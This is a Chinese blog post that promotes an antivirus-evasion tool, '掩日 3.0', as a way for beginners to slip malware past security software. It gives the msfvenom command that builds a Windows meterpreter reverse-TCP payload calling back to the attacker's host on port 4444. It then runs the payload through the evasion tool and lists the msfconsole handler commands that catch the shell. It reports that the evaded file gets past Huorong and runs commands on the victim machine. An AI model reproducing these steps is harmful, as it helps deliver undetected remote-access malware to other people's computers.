强推!这款工具非常强,小白也能绕过杀软!

于 2021-08-03 21:18:22 发布
阅读量541 收藏 1
点赞数
分类专栏: 测试框架 测试 职场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ningmengban/article/details/119359317
版权
测试 同时被 3 个专栏收录
86 篇文章 8 订阅
订阅专栏
职场
17 篇文章 0 订阅
订阅专栏
测试框架
11 篇文章 1 订阅
订阅专栏

1.环境

攻击机:kali Linux 10.211.55.23

受害机:Windows10 360 主动防御

Windows7 火绒主动防御

2.生成 exe 文件

在 kali Linux 下使用 msfvenom 生成一个 64 位的 exe 文件

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.211.55.23 lport=4444 -f exe -o 1.exe

图片

将文件分别发送至 Windows10 上,此时需要将受害者的机器关闭全部杀软

使用掩日 3.0 进行免杀处理(这里会提示报错,需要安装一个软件,按照提示安装即可)

下载地址:

https://github.com/1y0n/av_evasion_tool/

将文件直接拖过来就行了

图片

最后会生成一个 YR_1.exe 文件

图片

将这两个文件分别压缩备份,发送到 window10 和 window7 上

图片

3.静态测试

打开各自的杀软进行测试

3.1 360

图片

均报毒

3.2 火绒

图片

只有一个文件报毒

4.上线测试

攻击机配置

msfconsole

use exploit/multi/handler

set LHOST 10.211.55.23

set LPORT 4444

set payload windows/x64/meterpreter/reverse_tcp

exploit

图片

4.1 360 下

4.2.1 1..exe

直接 gg

图片

4.2.2 免杀版 1.exe

直接 gg

图片

4.3 火绒

4.3.1. 1.exe

gg

图片

4.3.2 免杀版 1.exe

上线正常

图片

执行命令

图片

总结

总体上来说,这款免杀工具已经是非常强了,而且公开了这么久,还支持部分免杀,很厉害了!👍

ningmengban
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
博客
微服务架构 RPC 接口到底是什么?如何测试?
08-23 647
微服务通常分布在不同的网络节点上,RPC接口使得一个服务可以像调用本地方法一样调用另一个远程服务的方法,比如当服务A需要调用服务B的功能时,服务A可以通过RPC接口向服务B发送请求并等待响应。RPC接口在现代软件架构中提供了一个灵活且强大的工具,特别是在分布式系统和微服务架构中,它能有效地简化服务之间的通信,支持跨平台、跨语言的调用,使得开发者能够更专注于业务逻辑,而不必过多关注底层通信的细节。在分布式系统中,多个服务可能部署在不同的服务器上,RPC接口使得这些服务可以像调用本地方法一样进行互相通信。
博客
一文掌握 Web 测试:功能、界面、兼容与安全的综合测试指南!
08-19 693
随着Web技术的不断演进,测试除了对应用的功能性、界面美观性、跨平台兼容性的基本要求外、安全性和性能的要求也逐步增高。因此,全面、系统的测试思维和策略成为了保证Web应用高质量的关键因素。本篇文章将从功能测试、界面测试、兼容性测试和安全测试四个方面,深入梳理测试要点,确保Web应用在各个层面上都能满足用户和业务的需求。通过这篇文章,希望对于构建全面测试思维,提供一些帮助。
博客
UI 自动化分布式测试 -Docker Selenium Grid
08-16 825
Docker 和 Selenium Grid 的结合为分布式 UI 自动化测试提供了一种高效、可扩展且易于管理的方法。通过使用 Docker 容器化技术,测试环境的设置和配置变得更加简便和一致;而 Selenium Grid 则允许在多个节点上并行运行分布式测试,从而大大提升测试的速度和覆盖范围。
博客
以搜索为例,从功能,到抓取接口,实现 Jmeter 接口自动化思路详解
08-15 803
不论是用工具去实现接口测试;还是用Python或Java去实现自动化测试,都是基于功能测试思路去实现。在追求更高效的工具、代码测试过程中,不要忘记了最为本质的测试思维能力的提升!本篇文章从功能入手,到自动化测试实现,带你一步步领略测试思维的重要性!
博客
性能测试常见的内存溢出问题: JVM 内存溢出如何调优?
08-14 437
针对java项目做性能测试的时候,很多同学都见过一个报错,就是OOM【Out Of MemoryError】;那出现这种报错就是项目发生了内存溢出的问题,这是比较严重的性能问题。所以,作为一个性能测试工程师,我们要能够分析JVM内存的问题以及理解其中的原理,才能更好的给JVM内存出现的性能瓶颈问题进行调优。
博客
2024虾皮测开一面+二面+hr面面经
08-14 561
(他的面试链接里面有牛客那种可以写代码的地方,之前主要做测试,代码能力倒退的不止一点。4,这个项目主要做什么,怎么做的,怎么测的,过程,内容,流程。请提前测试好音频,我服了,进去的时候没问题,和面试官开始面试之后,我的音频就没声音,最后是戴耳机解决的。然后我很快给出了第二个答案,如果有lastname这个玩意,让它=我的姓,但我感觉他不是想考这个。12,前公司的自动化测试平台自研项目我是如何使用的,底层代码框架知道不,用的什么框架?6,代码题:给定字符串,不论大小写,统计文中出现的字符个数,语言不限。
博客
你们公司的网站真的安全吗?快用我的SQL注入脚本测试下吧。
08-13 896
SQL注入(SQL Injection)是一种常见且危险的漏洞类型,攻击者可以通过这种漏洞获取数据库中的敏感信息,甚至对数据库进行增删改查操作。在国内发生的多起重大数据泄露事件中,SQL注入漏洞往往是攻击者入侵系统并获取数据的主要手段之一。
博客
不得不掌握的性能测试监控神器 -nmon 工具详解
08-12 871
跟我们性能相关的数据是第二列和第三列:发送和接受的报文的多少,还跟网卡的处理上限和带宽的上限的关系,取他们的最小值【短板】跟我们发送和接受的数据做比对,判断网络就是否成为了性能瓶颈了。1)c:进入nmon界面输入小写的c,就可以看到cpu的统计信息,会包括详细信息如下:用户态 系统态 等待io的CPU和空闲占的CPU情况;我们可以通过./nmon -h 进入完整的帮助手册,可以看到详细的所有的命令参数。Network I/O部分:显示接受和发送的包的大小,接受和发送的包的个数,接受和发送包的尺寸等信息。
博客
企业级资源监控方案落地:Prometheus+Grafana+Export
08-09 438
我们有高很多的Linux的命令可以去监控各种资源,比如top,vmstat,iostat,pidstat等,但是命令使用有一定的门槛,结果看起来也没那么直观,所以现在很多公司都用Prometheus+grafana+export方案来进行资源监控。1、数据源的配置出现连接不上问题,报错连接失败:基本上是服务启动的问题或者prometheus的配置文件的问题,可以检查一下;你想用 Prometheus监控平台,去监控其他的服务, 可以去找服务对应的 exporter,按照安装说明,进行配置。
博客
Jmeter+influxdb+grafana 性能测试结果监控
08-07 840
我们做性能测试的时候使用Jmeter自身的监听器统计压测结果虽然可以统计到各个维度的信息,比如TPS,RT,Err等,但是这个Jmeter本身的监控没有办法做存储,也没有办法去找历史数据,所以如果想要持久化储存数据,我们就需要采用监控平台+ influxdb时序数据库进行性能测试结果的监控。
博客
12年磨一剑:软件测试老兵的十条生存法则
08-06 244
对于测试经理来说,建立完善的性能测试和监控流程,并定期进行性能优化和评估,是提升系统性能和用户体验的重要手段。掌握自动化测试、CI/CD、AI/ML等新技术,提升安全测试、性能测试等关键能力,拓宽技术视野,注重软技能的培养,是保持竞争力的关键。此外,作为管理,测试经理还需要关注团队的整体发展和绩效,建立有效的激励机制和反馈机制,鼓励团队成员不断进步和创新。在现代软件开发环境中,测试团队的作用越来越重要,测试经理需要通过有效的管理和领导,提升团队的技术水平和工作效率,为软件质量和用户体验保驾护航。
博客
性能测试瓶颈:CPU 问题的深度分析和调优
08-02 578
CPU 性能问题的深度分析和调优
博客
银行项目信用卡业务及测试,一文搞定。
07-30 269
随着金融市场的不断变化和银行业务的复杂化,测试工作的难度也在不断增加,对于测试人员的技能要求也在不断提高,掌握自动化测试、性能测试、安全测试等专业技能成趋势,也更有助于在银行测试领域获得更多且更高薪的就业机会。还款成功之后检查剩余金额以及应还的利息计算是否正确:剩余应还的账单金额=账单应还的金额-已还金额(最低)。统计的账单为:11月3日,12月3日,下1年的1月3日,2月3日的消费金额以及利息费用的总金额;检查最低还款金额的正确性,例如:设置的最低还款金额为应还金额的10%,应还金额*10%
博客
30天练完这些软件测试项目,面试拿下7offer
07-11 691
请求地址:http://127.0.0.1:8099/api/departments/?请求地址:http://127.0.0.1:8099/api/departments/?请求地址:http://127.0.0.1:8099/api/departments/?请求地址:http://127.0.0.1:8099/api/departments/?(注:$master_name_list:为参数名称;请求地址:http://127.0.0.1:8099/api/departments/T02/
博客
软件测试面试必杀篇:【2024软件测试面试八股文宝典】
05-30 888
800道软件测试面试真题,高清打印版打包带走,横扫软件测试面试高频问题,涵盖测试理论、Linux、MySQL、Web测试、接口测试、App测试、Python、Selenium、性能测试、LordRunner、计算机网络、数据结构与算法、逻辑思维、人力资源等模块面试题,命中率杠杠的,绝对是测试人的福音,面试者的最强武器。PS:加上参考答案有几十万字,答案就没有全部放上来了,高清打印版本超过400多页,留言直接获取。
博客
5 步轻松上手,教你从 0 到 1 落地 Jmeter 接口自动化脚本!
01-16 446
通过以上5步,就可以0代码实现Jmeter自动化脚本的基础开发。当然实际工作中的项目会存在很多需处理的业务场景,比如文件上传处理、关联到数据库的接口处理、接口加密传参处理、数据库断言处理等等,那么就需要大家具备更高阶技术、甚至是自己写代码去解决。学无止境,行以致远。更多软件测试学习资料可点击下方公众号链接领取。
博客
年底找工作的宝子们,千万不要错过这些数据库笔试题!
01-06 909
很多同学会趁着年底尝试找找工作,因为年底的岗位招聘一般来说都是急招,应聘的竞争者少,且薪资不低。特别是工作年限4年以下的宝子,面试前一般会先笔试,如果不想自己笔试受挫,那么以下给大家分享的这一波近期vip学员面试碰到的数据库笔试题,一定要牢牢码住!并多多练习!
博客
自动化脚本不稳定,原来是软件弹窗惹的祸,2个方法解决!
11-23 217
我们可以利用 try...catch...异常处理机制:当正常元素定位不到时捕获异常,进入到异常处理场景,再然后定位弹窗元素,存在则点掉。很多同学在学习 App 自动化或者在项目中落地实践 App 自动化时,会发现编写的自动化脚本无缘无故的执行失败、不稳定。因为弹窗有时候是随机出现的,并不是按照固定的路径复现,所以不能按照常规元素定位给点掉。如果不对这些弹窗进行处理,将会中断自动化脚本的运行,从而导致脚本执行不稳定。多看多借鉴还是有帮助的。
博客
软件测试职业生涯需要编写的全套文档模板,收藏这一篇就够了 ~
09-18 283
作为一名测试工程师,在整个的职业生涯中,会涉及到各种不同类型的文档编写,大体包括如下:对应文档模板及文档编写视频如下:在一个常规的软件测试流程中,会涉及到测试计划、测试方案、测试用例、测试报告的编写,这些文档也是软件测试岗位必须掌握的文档类型。测试计划是组织管理层面的文件,从组织管理的角度对一次测试活动进行规划。对测试全过程的测试范围、组织、资源、原则等进行规定和约束,并制定测试全过程各个阶段的任务分配以及时间进度安排,并提出对各项任务的评估,风险分析和管理需求。编写时间及依据:需求分析阶段之后,在开展具体
博客
通过电商项目,详解抓包到接口测试,附图片验证码 +cookie 问题处理!
08-17 288
以上的实操只是小试牛刀,抓包并进行接口测试,并不是简单地把抓取到的接口信息复制到工具中就能运行成功!在接口脚本设计过程中,会碰到各种各样的问题,像图片验证码处理、短信验证码处理、文件上传操作、关联接口提取数据、唯一参数值问题等等;而这些问题都是伴随着你真正的项目去实践的!另外,工作中完整的接口测试,是从接口需求-->接口用例设计-->接口脚本设计-->接口执行,定位bug并跟踪-->接口报告总结。而不仅仅只是某个工具Jmeter或postman的操作!学无止境,行以致远。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值